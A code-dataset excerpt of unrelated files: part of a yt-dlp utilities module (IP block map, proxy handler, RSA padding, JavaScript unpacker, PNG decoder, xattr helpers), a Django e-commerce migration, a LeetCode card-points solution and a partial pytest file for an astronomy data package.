'RS': '93.86.0.0/15',
'RU': '5.136.0.0/13',
'RW': '41.186.0.0/16',
'SA': '188.48.0.0/13',
'SB': '202.1.160.0/19',
'SC': '154.192.0.0/11',
'SD': '102.120.0.0/13',
'SE': '78.64.0.0/12',
'SG': '8.128.0.0/10',
'SI': '188.196.0.0/14',
'SK': '78.98.0.0/15',
'SL': '102.143.0.0/17',
'SM': '89.186.32.0/19',
'SN': '41.82.0.0/15',
'SO': '154.115.192.0/18',
'SR': '186.179.128.0/17',
'SS': '105.235.208.0/21',
'ST': '197.159.160.0/19',
'SV': '168.243.0.0/16',
'SX': '190.102.0.0/20',
'SY': '5.0.0.0/16',
'SZ': '41.84.224.0/19',
'TC': '65.255.48.0/20',
'TD': '154.68.128.0/19',
'TG': '196.168.0.0/14',
'TH': '171.96.0.0/13',
'TJ': '85.9.128.0/18',
'TK': '27.96.24.0/21',
'TL': '180.189.160.0/20',
'TM': '95.85.96.0/19',
'TN': '197.0.0.0/11',
'TO': '175.176.144.0/21',
'TR': '78.160.0.0/11',
'TT': '186.44.0.0/15',
'TV': '202.2.96.0/19',
'TW': '120.96.0.0/11',
'TZ': '156.156.0.0/14',
'UA': '37.52.0.0/14',
'UG': '102.80.0.0/13',
'US': '6.0.0.0/8',
'UY': '167.56.0.0/13',
'UZ': '84.54.64.0/18',
'VA': '212.77.0.0/19',
'VC': '207.191.240.0/21',
'VE': '186.88.0.0/13',
'VG': '66.81.192.0/20',
'VI': '146.226.0.0/16',
'VN': '14.160.0.0/11',
'VU': '202.80.32.0/20',
'WF': '117.20.32.0/21',
'WS': '202.4.32.0/19',
'YE': '134.35.0.0/16',
'YT': '41.242.116.0/22',
'ZA': '41.0.0.0/11',
'ZM': '102.144.0.0/13',
'ZW': '102.177.192.0/18',
}
@classmethod
def random_ipv4(cls, code_or_block):
    """Return a random IPv4 address (str) inside the given CIDR block.

    code_or_block is either a two-letter country code (looked up in
    cls._country_ip_map; returns None when unknown) or a CIDR block
    string such as '1.2.3.0/24'.
    """
    if len(code_or_block) == 2:
        cidr = cls._country_ip_map.get(code_or_block.upper())
        if not cidr:
            return None
    else:
        cidr = code_or_block
    base_addr, prefix_len = cidr.split('/')
    lo = compat_struct_unpack('!L', socket.inet_aton(base_addr))[0]
    # Set all host bits to get the top of the block.
    hi = lo | (0xffffffff >> int(prefix_len))
    return compat_str(socket.inet_ntoa(
        compat_struct_pack('!L', random.randint(lo, hi))))
class PerRequestProxyHandler(compat_urllib_request.ProxyHandler):
    """ProxyHandler that honours a per-request proxy override supplied in
    the 'Ytdl-request-proxy' header, falling back to the handler-wide
    configuration ('__noproxy__' disables proxying entirely)."""

    def __init__(self, proxies=None):
        # Set default handlers for both schemes. The lambda default
        # arguments (proxy/type/meth) deliberately bind the *current* loop
        # values, avoiding the classic late-binding closure pitfall.
        for type in ('http', 'https'):
            setattr(self, '%s_open' % type,
                    lambda r, proxy='__noproxy__', type=type, meth=self.proxy_open:
                        meth(r, proxy, type))
        compat_urllib_request.ProxyHandler.__init__(self, proxies)

    def proxy_open(self, req, proxy, type):
        # A per-request proxy header (set by the downloader) overrides the
        # configured proxy; the header is consumed so it is never sent out.
        req_proxy = req.headers.get('Ytdl-request-proxy')
        if req_proxy is not None:
            proxy = req_proxy
            del req.headers['Ytdl-request-proxy']

        if proxy == '__noproxy__':
            return None  # No Proxy
        if compat_urlparse.urlparse(proxy).scheme.lower() in ('socks', 'socks4', 'socks4a', 'socks5'):
            # SOCKS proxying is signalled via a header; yt-dlp's http/https
            # handlers do the wrapping of the socket with socks themselves.
            req.add_header('Ytdl-socks-proxy', proxy)
            return None
        return compat_urllib_request.ProxyHandler.proxy_open(
            self, req, proxy, type)
# Both long_to_bytes and bytes_to_long are adapted from PyCrypto, which is
# released into Public Domain
# https://github.com/dlitz/pycrypto/blob/master/lib/Crypto/Util/number.py#L387
def long_to_bytes(n, blocksize=0):
    """long_to_bytes(n:long, blocksize:int) : string
    Convert an integer to a big-endian byte string.
    If optional blocksize is given and greater than zero, pad the front of the
    byte string with binary zeros so that the length is a multiple of
    blocksize.
    """
    n = int(n)
    if n > 0:
        # int.to_bytes yields the minimal big-endian representation; this
        # replaces the original manual 32-bit chunk packing plus leading
        # zero stripping with identical results.
        s = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    else:
        # Matches the historic behaviour: n <= 0 encodes as one zero byte.
        s = b'\x00'
    # Pad the front so len(s) is a multiple of blocksize.
    if blocksize > 0 and len(s) % blocksize:
        s = b'\x00' * (blocksize - len(s) % blocksize) + s
    return s
def bytes_to_long(s):
    """bytes_to_long(string) : long
    Convert a big-endian byte string to an integer.
    This is (essentially) the inverse of long_to_bytes().
    """
    # int.from_bytes replaces the original manual front-padding plus 32-bit
    # chunk accumulation; behaviour is identical (b'' -> 0).
    return int.from_bytes(s, 'big')
def ohdave_rsa_encrypt(data, exponent, modulus):
    '''
    Implement OHDave's RSA algorithm. See http://www.ohdave.com/rsa/

    Input:
        data: data to encrypt, bytes-like object
        exponent, modulus: parameter e and N of RSA algorithm, both integer
    Output: hex string of encrypted data

    Limitation: supports one block encryption only
    '''
    # The payload is the data interpreted little-endian (hence the reversal
    # before hexlify), as OHDave's JS implementation does.
    reversed_hex = binascii.hexlify(data[::-1])
    payload = int(reversed_hex, 16)
    return format(pow(payload, exponent, modulus), 'x')
def pkcs1pad(data, length):
    """
    Padding input data with PKCS#1 scheme

    @param {int[]} data input data
    @param {int} length target length
    @returns {int[]} padded data
    """
    if len(data) > length - 11:
        raise ValueError('Input data too long for PKCS#1 padding')

    # EME-PKCS1-v1_5 (RFC 8017 section 7.2.1): the padding string PS must
    # consist of NONZERO pseudo-random octets. The previous randint(0, 254)
    # could emit 0x00, which a decoder would treat as the end-of-padding
    # separator and truncate the message.
    pseudo_random = [random.randint(1, 255) for _ in range(length - len(data) - 3)]
    return [0, 2] + pseudo_random + [0] + data
def encode_base_n(num, n, table=None):
    """Encode the non-negative integer num in base n.

    table supplies the digit alphabet; it defaults to 0-9a-zA-Z truncated
    to n symbols. Raises ValueError when n exceeds the table length or when
    num is negative.
    """
    FULL_TABLE = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    if not table:
        table = FULL_TABLE[:n]

    if n > len(table):
        raise ValueError('base %d exceeds table length %d' % (n, len(table)))
    if num < 0:
        # Previously a negative num looped forever (num // n never reaches 0
        # for negative values in Python); fail fast instead.
        raise ValueError('num must be non-negative')

    if num == 0:
        return table[0]

    ret = ''
    while num:
        ret = table[num % n] + ret
        num = num // n
    return ret
def decode_packed_codes(code):
    """Decode JavaScript obfuscated with Dean Edwards' p.a.c.k.e.r."""
    mobj = re.search(PACKED_CODES_RE, code)
    obfuscated_code, base, count, symbols = mobj.groups()
    base = int(base)
    count = int(count)
    symbols = symbols.split('|')

    # Map every base-n token to its replacement symbol; empty slots in the
    # symbol list map the token to itself.
    symbol_table = {}
    for idx in range(count):
        token = encode_base_n(idx, base)
        symbol_table[token] = symbols[idx] or token

    return re.sub(
        r'\b(\w+)\b', lambda m: symbol_table[m.group(0)],
        obfuscated_code)
def caesar(s, alphabet, shift):
    """Rotate every character of s that occurs in alphabet by shift
    positions (wrapping around); other characters pass through unchanged."""
    if shift == 0:
        return s
    size = len(alphabet)

    def rotate(ch):
        if ch not in alphabet:
            return ch
        return alphabet[(alphabet.index(ch) + shift) % size]

    return ''.join(rotate(ch) for ch in s)
def rot47(s):
    """Apply the ROT47 cipher: rotate the 94 printable ASCII characters
    ('!' .. '~', i.e. chr(33)..chr(126)) by 47 positions."""
    printable_ascii = ''.join(chr(c) for c in range(33, 127))
    return caesar(s, printable_ascii, 47)
def parse_m3u8_attributes(attrib):
    """Parse an M3U8 attribute list ('KEY=VALUE,KEY="VAL,UE",...') into a
    dict; surrounding quotes are stripped from quoted values."""
    info = {}
    # '"[^"]*"' (rather than '"[^"]+"') also accepts empty quoted values
    # such as CODECS="", which previously were silently dropped.
    for (key, val) in re.findall(r'(?P<key>[A-Z0-9-]+)=(?P<val>"[^"]*"|[^",]+)(?:,|$)', attrib):
        if val.startswith('"'):
            val = val[1:-1]
        info[key] = val
    return info
def urshift(val, n):
    """Unsigned (logical) right shift of a 32-bit value, i.e. JavaScript's
    '>>>': negative values are reinterpreted as unsigned 32-bit first."""
    if val < 0:
        val += 0x100000000
    return val >> n
# Based on png2str() written by @gdkchan and improved by @yokrysty
# Originally posted at https://github.com/ytdl-org/youtube-dl/issues/9706
def decode_png(png_data):
    """Decode a PNG byte string into (width, height, pixels).

    pixels is a list of rows, each a flat list of channel bytes with a
    stride of width * 3 (assumes 3 bytes per pixel, i.e. 8-bit RGB,
    non-interlaced — TODO confirm for other color types).
    Raises IOError on malformed input.
    """
    # Reference: https://www.w3.org/TR/PNG/

    header = png_data[8:]

    # Validate the PNG signature and that the first chunk is IHDR.
    if png_data[:8] != b'\x89PNG\x0d\x0a\x1a\x0a' or header[4:8] != b'IHDR':
        raise IOError('Not a valid PNG file.')

    # Big-endian unsigned int of 1, 2 or 4 bytes.
    int_map = {1: '>B', 2: '>H', 4: '>I'}
    unpack_integer = lambda x: compat_struct_unpack(int_map[len(x)], x)[0]

    # Split the stream into chunks: 4-byte length, 4-byte type, payload, CRC.
    chunks = []

    while header:
        length = unpack_integer(header[:4])
        header = header[4:]

        chunk_type = header[:4]
        header = header[4:]

        chunk_data = header[:length]
        header = header[length:]

        header = header[4:]  # Skip CRC

        chunks.append({
            'type': chunk_type,
            'length': length,
            'data': chunk_data
        })

    # IHDR is always first; width and height are its first two fields.
    ihdr = chunks[0]['data']

    width = unpack_integer(ihdr[:4])
    height = unpack_integer(ihdr[4:8])

    # Image data may be split across multiple IDAT chunks; concatenate
    # before inflating.
    idat = b''

    for chunk in chunks:
        if chunk['type'] == b'IDAT':
            idat += chunk['data']

    if not idat:
        raise IOError('Unable to read PNG data.')

    decompressed_data = bytearray(zlib.decompress(idat))

    stride = width * 3  # 3 channel bytes per pixel
    pixels = []

    def _get_pixel(idx):
        # Look up an already-reconstructed channel byte by flat index.
        x = idx % stride
        y = idx // stride
        return pixels[y][x]

    for y in range(height):
        # Each scanline is prefixed with one filter-type byte (PNG spec 9.2).
        basePos = y * (1 + stride)
        filter_type = decompressed_data[basePos]

        current_row = []

        pixels.append(current_row)

        for x in range(stride):
            color = decompressed_data[1 + basePos + x]
            basex = y * stride + x
            left = 0
            up = 0

            # 'left' is the same channel of the previous pixel (3 bytes
            # back, hence x > 2); 'up' the same channel one scanline above.
            if x > 2:
                left = _get_pixel(basex - 3)
            if y > 0:
                up = _get_pixel(basex - stride)

            # Undo the per-scanline filter (types 0-4).
            if filter_type == 1:  # Sub
                color = (color + left) & 0xff
            elif filter_type == 2:  # Up
                color = (color + up) & 0xff
            elif filter_type == 3:  # Average
                color = (color + ((left + up) >> 1)) & 0xff
            elif filter_type == 4:  # Paeth
                a = left
                b = up
                c = 0

                if x > 2 and y > 0:
                    c = _get_pixel(basex - stride - 3)

                p = a + b - c

                pa = abs(p - a)
                pb = abs(p - b)
                pc = abs(p - c)

                # Paeth predictor: pick the neighbour closest to p.
                if pa <= pb and pa <= pc:
                    color = (color + a) & 0xff
                elif pb <= pc:
                    color = (color + b) & 0xff
                else:
                    color = (color + c) & 0xff

            current_row.append(color)

    return width, height, pixels
def write_xattr(path, key, value):
    """Set extended attribute `key` to `value` (bytes) on the file at `path`.

    Tries, in order: the pyxattr/xattr Python modules, NTFS Alternate Data
    Streams on Windows, then the setfattr/xattr command-line tools.
    Raises XAttrMetadataError when setting fails and XAttrUnavailableError
    when no usable implementation is found.
    """
    # This mess below finds the best xattr tool for the job
    try:
        # try the pyxattr module...
        import xattr

        if hasattr(xattr, 'set'):  # pyxattr
            # Unicode arguments are not supported in python-pyxattr until
            # version 0.5.0
            # See https://github.com/ytdl-org/youtube-dl/issues/5498
            pyxattr_required_version = '0.5.0'
            if version_tuple(xattr.__version__) < version_tuple(pyxattr_required_version):
                # TODO: fallback to CLI tools
                raise XAttrUnavailableError(
                    'python-pyxattr is detected but is too old. '
                    'yt-dlp requires %s or above while your version is %s. '
                    'Falling back to other xattr implementations' % (
                        pyxattr_required_version, xattr.__version__))

            setxattr = xattr.set
        else:  # xattr
            setxattr = xattr.setxattr

        try:
            setxattr(path, key, value)
        except EnvironmentError as e:
            raise XAttrMetadataError(e.errno, e.strerror)

    except ImportError:
        if compat_os_name == 'nt':
            # Write xattrs to NTFS Alternate Data Streams:
            # http://en.wikipedia.org/wiki/NTFS#Alternate_data_streams_.28ADS.29
            assert ':' not in key
            assert os.path.exists(path)

            ads_fn = path + ':' + key
            try:
                with open(ads_fn, 'wb') as f:
                    f.write(value)
            except EnvironmentError as e:
                raise XAttrMetadataError(e.errno, e.strerror)
        else:
            user_has_setfattr = check_executable('setfattr', ['--version'])
            user_has_xattr = check_executable('xattr', ['-h'])

            if user_has_setfattr or user_has_xattr:
                # The CLI tools take the value as a text argument.
                value = value.decode('utf-8')
                if user_has_setfattr:
                    executable = 'setfattr'
                    opts = ['-n', key, '-v', value]
                elif user_has_xattr:
                    executable = 'xattr'
                    opts = ['-w', key, value]

                cmd = ([encodeFilename(executable, True)]
                       + [encodeArgument(o) for o in opts]
                       + [encodeFilename(path, True)])

                try:
                    p = subprocess.Popen(
                        cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                except EnvironmentError as e:
                    raise XAttrMetadataError(e.errno, e.strerror)
                stdout, stderr = process_communicate_or_kill(p)
                stderr = stderr.decode('utf-8', 'replace')
                if p.returncode != 0:
                    raise XAttrMetadataError(p.returncode, stderr)

            else:
                # On Unix, and can't find pyxattr, setfattr, or xattr.
                if sys.platform.startswith('linux'):
                    raise XAttrUnavailableError(
                        "Couldn't find a tool to set the xattrs. "
                        "Install either the python 'pyxattr' or 'xattr' "
                        "modules, or the GNU 'attr' package "
                        "(which contains the 'setfattr' tool).")
                else:
                    raise XAttrUnavailableError(
                        "Couldn't find a tool to set the xattrs. "
                        "Install either the python 'xattr' module, "
                        "or the 'xattr' binary.")
def random_birthday(year_field, month_field, day_field):
    """Pick a uniformly random date between 1950-01-01 and 1995-12-31 and
    return it as a dict of string values under the supplied field names."""
    earliest = datetime.date(1950, 1, 1)
    latest = datetime.date(1995, 12, 31)
    span_days = (latest - earliest).days
    picked = earliest + datetime.timedelta(random.randint(0, span_days))
    return {
        year_field: str(picked.year),
        month_field: str(picked.month),
        day_field: str(picked.day),
    }
# Templates for internet shortcut files, which are plain text files.

# Windows .url shortcut format.
DOT_URL_LINK_TEMPLATE = '''
[InternetShortcut]
URL=%(url)s
'''.lstrip()

# macOS .webloc shortcut format (a plist XML document).
DOT_WEBLOC_LINK_TEMPLATE = '''
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
\t<key>URL</key>
\t<string>%(url)s</string>
</dict>
</plist>
'''.lstrip()

# freedesktop.org .desktop link format (Linux desktop environments).
DOT_DESKTOP_LINK_TEMPLATE = '''
[Desktop Entry]
Encoding=UTF-8
Name=%(filename)s
Type=Link
URL=%(url)s
Icon=text-html
'''.lstrip()
def iri_to_uri(iri):
    """
    Converts an IRI (Internationalized Resource Identifier, allowing Unicode characters) to a URI (Uniform Resource Identifier, ASCII-only).

    The function doesn't add an additional layer of escaping; e.g., it doesn't escape `%3C` as `%253C`. Instead, it percent-escapes characters with an underlying UTF-8 encoding *besides* those already escaped, leaving the URI intact.
    """

    iri_parts = compat_urllib_parse_urlparse(iri)

    if '[' in iri_parts.netloc:
        raise ValueError('IPv6 URIs are not, yet, supported.')
        # Querying `.netloc`, when there's only one bracket, also raises a ValueError.

    # The `safe` argument values, that the following code uses, contain the characters that should not be percent-encoded. Everything else but letters, digits and '_.-' will be percent-encoded with an underlying UTF-8 encoding. Everything already percent-encoded will be left as is.

    # Rebuild the network location, quoting credentials and punycoding the host.
    net_location = ''
    if iri_parts.username:
        net_location += compat_urllib_parse_quote(iri_parts.username, safe=r"!$%&'()*+,~")
        if iri_parts.password is not None:
            net_location += ':' + compat_urllib_parse_quote(iri_parts.password, safe=r"!$%&'()*+,~")
        net_location += '@'

    net_location += iri_parts.hostname.encode('idna').decode('utf-8')  # Punycode for Unicode hostnames.
    # The 'idna' encoding produces ASCII text.
    if iri_parts.port is not None and iri_parts.port != 80:
        net_location += ':' + str(iri_parts.port)

    return compat_urllib_parse_urlunparse(
        (iri_parts.scheme,
            net_location,

            compat_urllib_parse_quote_plus(iri_parts.path, safe=r"!$%&'()*+,/:;=@|~"),

            # Unsure about the `safe` argument, since this is a legacy way of handling parameters.
            compat_urllib_parse_quote_plus(iri_parts.params, safe=r"!$%&'()*+,/:;=@|~"),

            # Not totally sure about the `safe` argument, since the source does not explicitly mention the query URI component.
            compat_urllib_parse_quote_plus(iri_parts.query, safe=r"!$%&'()*+,/:;=?@{|}~"),

            compat_urllib_parse_quote_plus(iri_parts.fragment, safe=r"!#$%&'()*+,/:;=?@{|}~")))

    # Source for `safe` arguments: https://url.spec.whatwg.org/#percent-encoded-bytes.
def to_high_limit_path(path):
    """On Windows/Cygwin, prefix the absolute path with '\\\\?\\' to bypass
    the MAX_PATH limitation; elsewhere return the path unchanged."""
    if sys.platform in ['win32', 'cygwin']:
        # Work around MAX_PATH limitation on Windows. The maximum allowed
        # length for the individual path segments may still be quite limited.
        return '\\\\?\\' + os.path.abspath(path)
    return path
def format_field(obj, field, template='%s', ignore=(None, ''), default='', func=None):
    """Render obj[field] through template, first applying func when given.
    Missing fields and values in `ignore` (checked both before and after
    func) yield `default` instead."""
    val = obj.get(field, default)
    if func and val not in ignore:
        val = func(val)
    if val in ignore:
        return default
    return template % val
def clean_podcast_url(url):
    """Strip known podcast tracking/analytics redirect prefixes from url."""
    tracking_prefix_re = r'''(?x)
        (?:
            (?:
                chtbl\.com/track|
                media\.blubrry\.com| # https://create.blubrry.com/resources/podcast-media-download-statistics/getting-started/
                play\.podtrac\.com
            )/[^/]+|
            (?:dts|www)\.podtrac\.com/(?:pts/)?redirect\.[0-9a-z]{3,4}| # http://analytics.podtrac.com/how-to-measure
            flex\.acast\.com|
            pd(?:
                cn\.co| # https://podcorn.com/analytics-prefix/
                st\.fm # https://podsights.com/docs/
            )/e
        )/'''
    return re.sub(tracking_prefix_re, '', url)
_HEX_TABLE = '0123456789abcdef'


def random_uuidv4():
    """Return a random UUIDv4-shaped string. Note: the variant nibble
    (position 19) is fully random rather than restricted to 8-b as
    RFC 4122 prescribes — kept for compatibility."""
    template = 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'
    return ''.join(
        random.choice(_HEX_TABLE) if ch in 'xy' else ch
        for ch in template)
def make_dir(path, to_screen=None):
    """Ensure the parent directory of `path` exists.

    Returns True on success (or when nothing needed creating), False on
    failure; failures are reported through `to_screen` when it is callable.
    """
    try:
        dn = os.path.dirname(path)
        if dn and not os.path.exists(dn):
            os.makedirs(dn)
        return True
    except (OSError, IOError) as err:
        # Bug fix: this used to read `if callable(to_screen) is not None`,
        # which is always True (callable() returns a bool), so a failure
        # with the default to_screen=None raised TypeError here.
        if callable(to_screen):
            to_screen('unable to create directory ' + error_to_compat_str(err))
        return False
def get_executable_path():
    """Return the absolute base path of the running program: the executable
    directory under PyInstaller, the archive root when running from a ZIP,
    or the package parent directory otherwise."""
    from zipimport import zipimporter
    if hasattr(sys, 'frozen'):  # Running from PyInstaller
        base = os.path.dirname(sys.executable)
    elif isinstance(globals().get('__loader__'), zipimporter):  # Running from ZIP
        base = os.path.join(os.path.dirname(__file__), '../..')
    else:
        base = os.path.join(os.path.dirname(__file__), '..')
    return os.path.abspath(base)
def load_plugins(name, suffix, namespace):
    """Load classes whose names end with `suffix` from the plugin module
    `name` under <executable dir>/ytdlp_plugins, inject them into
    `namespace`, and return the list of newly added classes.

    NOTE(review): uses the deprecated `imp` module (removed in Python
    3.12); should eventually be ported to importlib.
    """
    plugin_info = [None]
    classes = []
    try:
        plugin_info = imp.find_module(
            name, [os.path.join(get_executable_path(), 'ytdlp_plugins')])
        plugins = imp.load_module(name, *plugin_info)
        for name in dir(plugins):
            # Skip names already present (don't overwrite built-ins) and
            # anything not matching the expected class-name suffix.
            if name in namespace:
                continue
            if not name.endswith(suffix):
                continue
            klass = getattr(plugins, name)
            classes.append(klass)
            namespace[name] = klass
    except ImportError:
        # No plugin module found - that's fine, plugins are optional.
        pass
    finally:
        # imp.find_module returns an open file object that must be closed.
        if plugin_info[0] is not None:
            plugin_info[0].close()
    return classes
def traverse_obj(
        obj, *key_list, default=None, expected_type=None,
        casesense=True, is_user_input=False, traverse_string=False):
    ''' Traverse nested list/dict/tuple

    Each element of key_list is one path (a sequence of keys); the first
    path resolving to a non-None value (of expected_type, when given) wins.

    @param default         Default value to return
    @param expected_type   Only accept final value of this type
    @param casesense       Whether to consider dictionary keys as case sensitive
    @param is_user_input   Whether the keys are generated from user input. If True,
                           strings are converted to int/slice if necessary
    @param traverse_string Whether to traverse inside strings. If True, any
                           non-compatible object will also be converted into a string
    '''
    if not casesense:
        _lower = lambda k: k.lower() if isinstance(k, str) else k
        # Lazily lower-case every key of every path.
        key_list = ((_lower(k) for k in keys) for keys in key_list)

    def _traverse_obj(obj, keys):
        # Walk a single path; returns None as soon as a step fails.
        for key in list(keys):
            if isinstance(obj, dict):
                # NOTE: _lower only exists when casesense is False; the
                # `casesense or ...` short-circuit keeps this safe otherwise.
                obj = (obj.get(key) if casesense or (key in obj)
                       else next((v for k, v in obj.items() if _lower(k) == key), None))
            else:
                if is_user_input:
                    # Convert user-supplied string keys into int indices or
                    # slices ('a:b' syntax) for sequence access.
                    key = (int_or_none(key) if ':' not in key
                           else slice(*map(int_or_none, key.split(':'))))
                    if not isinstance(key, (int, slice)):
                        return None
                if not isinstance(obj, (list, tuple)):
                    if not traverse_string:
                        return None
                    obj = str(obj)
                try:
                    obj = obj[key]
                except IndexError:
                    return None
        return obj

    for keys in key_list:
        val = _traverse_obj(obj, keys)
        if val is not None:
            if expected_type is None or isinstance(val, expected_type):
                return val
    return default
def traverse_dict(dictn, keys, casesense=True):
    ''' For backward compatibility. Do not use '''
    # Deprecated thin wrapper around traverse_obj() with user-input
    # key conversion and string traversal forced on.
    return traverse_obj(dictn, keys, casesense=casesense,
                        is_user_input=True, traverse_string=True)
def variadic(x, allowed_types=str):
    """Return x unchanged when it is an iterable (excluding allowed_types,
    e.g. plain strings); otherwise wrap it in a 1-tuple."""
    # Bug fix: `collections.Iterable` was removed in Python 3.10; the ABC
    # lives in collections.abc (imported locally to avoid touching the
    # module's import block).
    from collections.abc import Iterable
    return x if isinstance(x, Iterable) and not isinstance(x, allowed_types) else (x,)
| 29.990127 | 282 | 0.518456 |
795c567ca08b4801dbbeefb3cae034edd19fb119 | 3,406 | py | Python | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-06-29 05:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('locality', models.IntegerField()),
('city', models.CharField(max_length=50)),
('zipcode', models.IntegerField()),
('state', models.CharField(choices=[('Andaman & Nicobar Island ', 'Andaman & Nicobar Islands'), ('Andhra Pradesh', 'Andhra Pradesh'), ('Arunachal Pradesh', 'Arunachal Pradesh'), ('Assam', 'Assam'), ('Bihar', 'Bihar'), ('Chandigarh', 'Chandigarh'), ('Chhattisgarh', 'Chhattisgarh')], max_length=50)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('selling_price', models.FloatField()),
('discounted_price', models.FloatField()),
('description', models.TextField()),
('brand', models.CharField(max_length=100)),
('category', models.CharField(choices=[('M', 'Mobile'), ('L', 'Laptop'), ('TW', 'Top Wear'), ('BW', 'Bottom Wear')], max_length=2)),
('product_image', models.ImageField(upload_to='productimg')),
],
),
migrations.CreateModel(
name='OrderPlaced',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.PositiveIntegerField(default=1)),
('ordered_date', models.DateField(auto_now_add=True)),
('status', models.CharField(choices=[('Accepted', 'Accepted'), ('Packed', 'Packed'), ('On The Way', 'On The Way'), ('Delivered', 'Delivered'), ('Cancel', 'Cancel')], default='Pending', max_length=50)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.customer')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.PositiveIntegerField(default=1)),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 53.21875 | 315 | 0.592777 |
795c5748dbbb5ccb628e757c4e0222014859de33 | 754 | py | Python | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | from typing import List
class Solution:
    def maxScore(self, cardPoints: List[int], k: int) -> int:
        """Maximum points from taking k cards off either end.

        Equivalent to: total sum minus the minimum-sum contiguous window of
        the len(cardPoints) - k cards that remain. Found with one sliding
        window pass, O(n) time / O(1) extra space.
        """
        total = sum(cardPoints)
        window = len(cardPoints) - k
        if window == 0:
            return total
        window_sum = sum(cardPoints[:window])
        best = window_sum
        for right in range(window, len(cardPoints)):
            window_sum += cardPoints[right] - cardPoints[right - window]
            if window_sum < best:
                best = window_sum
        return total - best
if __name__== '__main__':
    # Ad-hoc smoke test: taking 3 cards from [100,40,17,9,73,75] should
    # score 248 (100 + 73 + 75), so this prints True.
    solution = Solution()
    cardPoints = [100,40,17,9,73,75]
    k = 3
    ans = solution.maxScore(cardPoints, k)
    print(ans == 248)
| 30.16 | 77 | 0.55305 |
795c57e4813ed3173b8c2d7c2c8f42550fdc7e8f | 5,270 | py | Python | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | # mpcformat/tests/test_mpcdata.py
# import pytest
# Third-party imports
import json
import os
# Import other required local modules/functions
import mpcdata.params as params
# Import the specific package/module/function we are testing
import mpcdata.mpcdata as mpcdata
'''
def test_MPCMasterFile():
"""
Want to see the successful return of a masterDict from an MPCMasterFile object
... both when a local master-file already exists and when it doesn't
"""
for master_type in ['external']:#, 'internal']:
# Forcibly delete any local master-file ('external_master_list.txt')
filepath = params.fileDict[master_type]
try:
os.remove(filepath)
except OSError:
pass
assert not os.path.exists(filepath)
# Running open_master_list should
# (i) generate a filepath
# (ii) download a masterDict & save-it to disk
MPCMF = mpcdata.MPCMasterFile(master_type)
filepath = MPCMF.filepath
masterDict = MPCMF.masterDict
assert os.path.exists(filepath)
assert 'leap-seconds' in masterDict
# Running open_master_list again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(filepath)
MPCMF = mpcdata.MPCMasterFile(master_type)
filepath = MPCMF.filepath
masterDict = MPCMF.masterDict
modtimeAfter = os.path.getmtime(filepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
def test_MPCMasterFile_for_nonexistant_type():
"""
Want to check what happens when a nonexistant master-list-type is passed
This test prob won't work due to poor exception handling
"""
master_type = 'ThisStringShouldNotWork'
try:
MPCMF = mpcdata.MPCMasterFile(master_type)
passed = True
except:
passed = False
assert not passed
'''
def test_MPCFile_external():
    """
    Want to see the successful return of a filepath & filecontents from MPCFile object
    ... both when the local file already exists and when it doesn't
    This is for some EXTERNAL (i.e. non-MPC) file
    """
    filename = 'leap-seconds.list'
    master_type ='external'
    expectedfilepath = os.path.join(params.dirDict[master_type],filename)

    # Forcibly delete any local data file so we start from a clean slate.
    try:
        os.remove(expectedfilepath)
    except OSError:
        pass
    assert not os.path.exists(expectedfilepath)

